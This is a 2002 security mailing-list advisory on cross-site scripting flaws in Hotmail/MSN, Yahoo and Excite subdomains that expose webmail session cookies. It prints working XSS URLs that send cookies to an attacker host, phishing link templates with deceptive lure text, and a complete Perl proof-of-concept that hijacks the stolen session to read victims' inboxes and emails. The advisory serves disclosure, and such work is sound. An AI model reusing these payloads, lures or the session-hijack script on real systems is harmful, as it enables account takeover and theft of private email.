[NEWS] XSS Vulnerability in Major Websites (Hotmail, Yahoo and Excite)

From: support@securiteam.com
Date: 11/14/02 

From: support@securiteam.com
To: list@securiteam.com
Date: 14 Nov 2002 15:44:15 +0200

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

Beyond Security would like to welcome Tiscali World Online
to our service provider team.
For more info on their service offering IP-Secure,
please visit http://www.worldonline.co.za/services/work_ip.asp
- - - - - - - - -

  XSS Vulnerability in Major Websites (Hotmail, Yahoo and Excite)
------------------------------------------------------------------------

SUMMARY

All of the above named sites use cookies within their mail services. A
vulnerability in their web site allows remote attackers to cause it to
reveal the cookie to third party sites by requesting an especially
malformed URL (Containing a cross site scripting attack script).

DETAILS

Hotmail example:
Hotmail uses *.msn.com for there services, so with a XSS bug in any
*.msn.com the cookie for the email service can be captured. The example
XSS is in the 'article.asp' script on 'www.accesshollywood.msn.com'. This
script doesn't seem to be filtering anything, so a XSS-URL will be:

 -
http://www.accesshollywood.msn.com/news/article.asp?art=><scr!pt>window.open('http://host/cgi-bin/rompigema.pl?'+document.referrer+'%20'+document.cookie);</scr!pt>

Yahoo example:
The yahoo mail service uses a *.yahoo.com server, therefore an XSS on any
*.yahoo.com server will give the cookie of the mail server. The example
XSS is in the 'login' script on 'login.europe.yahoo.com'. This script
seems to be filtering < and %3C. But yahoo uses the same script for
multiple sites, and shows a picture for each site. Each one gets the name
of the picture partly from a variable. Therefore by changing the name of
the picture into something bogus and by adding an 'onError' you can insert
malicious JavaScript. An example XSS-URL would be:

 -
http://login.europe.yahoo.com/config/login?.intl=frx%22%20onerror=%22plof:window.open('http://host/cgi-bin/rompigema.pl?'%2Bdocument.referrer%2B'%20'%2Bdocument.cookie)%22%3E&.src=ym&.done=

Excite example:
The excite mail service uses a *.excite.com server, any XSS on an
*.excite.com can be used to get the mail service cookie. The example XSS
is in the 'spmywaymaint.jsp' script on 'sports.excite.com'. An example
XSS-URL would be:

 -
http://sports.excite.com/jsp/spmywaymaint.jsp?ru=X%22><scr!pt>window.open('http://host/cgi-bin/rompigema.pl?'%252Bdocument.referrer%252B'%20'%252bdocument.cookie);</scr!pt>

General:
One of the problems with these bugs is that the XSS-bug is on another
server/service and probably be maintained by other people than the people
who are maintaining the mail service. Because of this, fixing the bug can
take a lot more time than actually needed. Bugs on other services can
insecure the mail service, and because there are many services on those
sites most of the time it may be easy to find another XSS-bug.

Exploit:
The XSS bugs can be exploited by letting people click on a link in an
email.

Example links:

Hotmail:
 - <a href="http://www.accesshollywood.msn.com/news/article.asp?
art=><scr!pt>window.open('http://host/cgi-bin/rompigema.pl?'+
document.referrer+'%20'+document.cookie);</scr!pt>">Britney Nude!</a>

Yahoo:
 - <a href="http://login.europe.yahoo.com/config/login?.intl=
frx%22%20onerror=%22plof:window.open('http://host/cgi-bin/rompigema.pl?'%2Bdocument.cookie)%22%3E&.src=ym&.done=">Britney Nude!</a>

Excite:
 - <a
href="http://sports.excite.com/jsp/spmywaymaint.jsp?ru=X%22><scr!pt>window.open('http://host/cgi-bin/rompigema.pl?'%252Bdocument.referrer%252B'%20'%252bdocument.cookie);</scr!pt>">Britney Nude!</a>

The string 'Britney Nude' will trick some of the people to click on the
link. Other strings like "This email could not be shown because of an
error, please click _here_ to try again" will trick a lot more users.
Because many people will click such links without even thinking.

Other ways to exploit this are:
 - Giving people links through instant messengers.
 - Put JavaScript in any homepage, which will open the XSS bug.

Can be exploited for example in:
  - Not good filtered forums
  - Not good filtered guestbooks
 - Give people a URL which will redirect them to the XSS bug.

And people can think of other ways as well, actually it isn't really safe
to surf on the internet with a web mail account if the servers aren't
fully secure.

All the links above are going to a perl script. This script (rompigema.pl)
will get the cookie and the referrer of the 'victim', and then it will
make a request to the server to get the front page, inbox or an email from
the 'victim'.

This script is to show you how easy it is to abuse cookies from other
people, of course you also could try and put the cookie into your own
cookie-dir in windows or something.

NOTE: The Rompigema.pl script will only work when people click the link in
an email (not with the other ways written above), because it uses the
referrer to make it more easy to make the request. The script could be
altered so that it can be done without the referrer. An example of such a
script is the fragile.pl script written for the Lycos XSS/Cookie bug.

Rompigema.pl:
#!/usr/bin/perl
#
# Multiple XSS/Cookie Problems
# Proof of Concept
# N|ghtHawk
# nighthawk_at_hackers4hackers.org

use IO::Socket;

# OPTIONS
# 1. See Frontpage
# 2. See Inbox
# 3. Read An E-Mail
# 4. Only save Cookie
$option = "3";

# PATH
$path = "/tmp/mirrors/";

$cookie = "$ENV{QUERY_STRING}\;";
$cookie =~ s/%20/ /g;

if ($cookie =~ /http:\/\/(.*mail\.(.*)\..*com)(\/[^ ]* )(.*)/) {
  $host = $1;
  $type = $2;
  $req = $3;
  $cookie = $4;
  if ($req =~ /ArdSI=(.*)&ArdSI=/) {
    $ardsi = $1;
  }
}

if (!$cookie || !$host) { &no_cookie; }

%msn = (
  1 => "/cgi-bin/hmhome",
  2 => "/cgi-bin/HoTMaiL?curmbox=F000000001",
  filt => "<a *href=\"\/(cgi-bin\/getmsg\?.*)\">",
  name => "class=[^ ]*\">(.*@hotmail.com)<"
);

%yahoo = (
  1 => "/ym/Welcome?order=down&sort=date&pos=0",
  2 => "/ym/us/ShowFolder?box=Inbox&order=down&sort=date&pos=0",
  filt => "\/(ym\/ShowLetter?.*)\">",
  name => "<b>.* (.*\@yahoo.com)<\/b>"
);

%excite = (
  1 => "\/splash.php?ArdSI=$ardsi&ArdSI=$ardsi",
  2 => "\/folder_msglist.php?t=0&m=0&ArdSI=$ardsi&in=1",
  filt => "(msg_read.php?[^>]*)'",
  name => "<b>Hi (.*)!<\/b>"
);

$req = "$$type{2}";
if ($option == "1") { $req = "$$type{1}"; }

$data = request($host, $req);

if ($option == "3") {
  @datar = split(/\n/,$data);
  foreach $line (@datar) {
    if ($line =~ /$$type{filt}/) {
        $req = "/$1";
    }
  }
  $data = request($host, $req);
}

&out($data);

sub out {
  my ($data) = @_;
  @datar = split(/\n/,$data);
  foreach $line (@datar) {
    if ($line =~ /$$type{name}/) {
      $name = $1;
    }
  }
  if ($option == 4) {
    $data = "$name\n$cookie\n";
    $name = "cookies";
  }
  open(FILE,">>$path$name.html");
  print FILE "$data\n";
  close(FILE);
  print "Content-type: text/html\n";
  print "Location: http://www.dwheeler.com/secure-programs/".
        "Secure-Programs-HOWTO.html\n\n";
}

sub request {
  my ($host, $req) = @_;
  $sock = IO::Socket::INET->new(
  Proto => "tcp",
  PeerAddr => "$host",
  PeerPort => "80",
  Timeout => 30) || die "Could not create socket: $!\n";
  print $sock "GET $req HTTP/1.0\n".
  "Host: $host\n".
  "Accept: image/gif, image/x-xbitmap, */*\n".
  "Accept-Language: nl\n".
  "User-Agent: Pr00fOfConcept/1.0 \n".
  "Connection: Keep-Alive\n".
  "Cookie: $cookie\n\n";
  sleep(4);
  recv($sock,$data,200000,0);
  close($sock);
  return $data;
}

sub no_cookie {
  print "content-type: text/html\n\n";
  print "<h1>No Cookie or Referrer found</h1>\n";
  exit;
}

Patch:
Well, it's up to the sites to patch this. It would be a good idea to not
put insecure scripts on a server which uses the same cookies as your mail
system. Also N|ghtHawk really think an idea like HTTPOnly[1] would be a
good start in getting rid of all the XSS bugs.

Links:
[0]Lycos XSS/Cookie Advisory:
 - http://www.securiteam.com/securitynews/6R0041P60Q.html
 - http://www.dsinet.org/?id=3005

XSS:
 - http://www.cgisecurity.com/articles/xss-faq.shtml

[1]HttpOnly:
 - http://msdn.microsoft.com/library/en-us/dncode/html/secure10102002.asp

Meaning of Rompigema:
 - http://wwwtios.cs.utwente.nl/traduk/EO-EN/Traduku?rompig%5Eema

ADDITIONAL INFORMATION

The information has been provided by
<mailto:nighthawk_at_hackers4hackers.org> "N|ghtHawk" Thijs Bosschert.

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

Relevant Pages